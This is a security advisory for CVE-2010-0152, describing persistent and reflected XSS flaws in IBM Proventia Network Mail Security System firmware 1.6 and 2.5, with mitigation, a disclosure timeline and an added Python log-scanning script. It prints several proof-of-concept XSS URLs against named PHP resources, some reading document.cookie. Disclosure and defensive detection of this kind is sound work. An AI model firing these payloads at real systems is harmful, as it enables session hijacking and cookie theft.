| CVE: | CVE-2010-0152 |
| Vendor: | IBM |
| Products: | Proventia Network Mail Security System |
| Vulnerabilities: | Multiple Cross-Site Scripting (XSS) |
| Risk: | High |
| Attack Vector: | From Remote |
| Authentication: | Not Required/Required |
| Reference: | N/A |

Description

The web-based Local Management Interface of the IBM Proventia Network Mail Security System appliance (firmware 1.6 and 2.5) is vulnerable to multiple persistent and reflected XSS attacks. When exploited by an external or internal attacker, the identified vulnerabilities could lead to session hijacking, information disclosure, forced installation of a malicious file or Trojan on users' PCs, etc.

A persistent XSS vulnerability can be exploited by an external unauthenticated attacker to inject malicious scripting code which is persistently stored. When the system is accessed by authorised users, such malicious code could be used to severely compromise the security of the appliance.

A persistent XSS vulnerability identified in saved search filters (Mail Security->Email Browser) allows an internal authenticated attacker to inject malicious scripting code.

Multiple reflected XSS vulnerabilities can be exploited by manipulating parameters of the pvm_messagestore.php resource.

url_placeholder/pvm_messagestore.php?msgid=&sender=&rcpt=&subject=&meta=&mailsize=&folder=allfolders&date1=<script>alert('xss')</script>&date2=&s=mails&favname=

Reflected XSS vulnerabilities can be exploited by manipulating parameters of the following resources:

- userfilter parameter of pvm_user_management.php resource.
  url_placeholder/pvm_user_management.php?userfilter=1%22+onblur%3D%22alert%28%27xss%27%29

- ping parameter of sys_tools.php
  url_placeholder/sys_tools.php?form=ping&page=sys_ping.php&ping=<script>alert(document.cookie)</script>

- action parameter of pvm_cert_commaction.php resource
  url_placeholder/pvm_cert_commaction.php?ajax=1&action=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>

- action parameter of pvm_cert_serveraction.php resource.
  url_placeholder/pvm_cert_serveraction.php?ajax=1&action=>"'><script>alert(document.cookie)</script>

- action parameter of pvm_smtpstore.php resource.
  url_placeholder/pvm_smtpstore.php?id=frozen&action="><script>alert("XSS")</script>

- l parameter of /sla/index.php resource
  url_placeholder/sla/index.php?l="><script>alert(document.cookie)</script>

Affected Versions

IBM Proventia Network Mail Security System - virtual appliance (firmware 1.6)
IBM Proventia Network Mail Security System - virtual appliance (firmware 2.5)

Mitigation

Vendor recommends upgrading to PNMSS firmware 2.5.0.2 or later. Alternatively, please contact IBM for technical support.
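
An added example (not part of the original advisory and not IBM's code): a Python triage script that scans web access-log lines for requests to the resources listed in the Description whose named parameters decode to HTML markup characters, so that requests made before the upgrade can be reviewed. The Apache-style log format, the function names and the sample log lines are assumptions constructed for illustration; the advisory does not say which pvm_messagestore.php parameters are affected, so all of them are checked.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Resource -> reflected parameters named in the advisory. None = any parameter
# (assumption: the advisory does not enumerate the pvm_messagestore.php ones).
WATCHED = {
    "pvm_messagestore.php": None,
    "pvm_user_management.php": {"userfilter"},
    "sys_tools.php": {"ping"},
    "pvm_cert_commaction.php": {"action"},
    "pvm_cert_serveraction.php": {"action"},
    "pvm_smtpstore.php": {"action"},
    "sla/index.php": {"l"},
}
MARKUP = set("<>\"'")  # characters that let a value break out of HTML context
# Assumed Apache-style access log: ... "METHOD target HTTP/x.y" ...
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return (resource, param, percent-decoded value) for watched params with markup."""
    parts = urlsplit(target)
    hits = []
    for resource, params in WATCHED.items():
        if not parts.path.endswith("/" + resource):
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if (params is None or name in params) and MARKUP & set(value):
                hits.append((resource, name, value))
    return hits

def scan(lines):
    """Return [(line number, hits)] for log lines that need manual review."""
    flagged = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            flagged.append((number, hits))
    return flagged

# Constructed sample log lines (not taken from a real appliance).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /pvm_user_management.php?userfilter=1%22+onblur%3D%22alert%28%27xss%27%29 HTTP/1.1" 200 4312',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /sys_tools.php?form=ping&page=sys_ping.php&ping=192.0.2.1 HTTP/1.1" 200 811',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /pvm_messagestore.php?folder=allfolders&date1=%3Cb%3E&s=mails HTTP/1.1" 200 2290',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Parameters submitted in POST bodies do not appear in access logs, and the persistent XSS cases store their input rather than reflecting it, so a clean result here covers only the reflected, query-string cases.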

Disclosure Timeline

2009, November 07: Vulnerabilities discovered and documented
2009, November 08: Notification sent to IBM
2009, November 09: IBM acknowledges receiving the report
2010, March: IBM releases PNMSS Firmware 2.5.0.2 correcting the reported issues
2010, September 12: MVSA-10-007 advisory published.

MVSA-10-007
Dr. Marian Ventuneac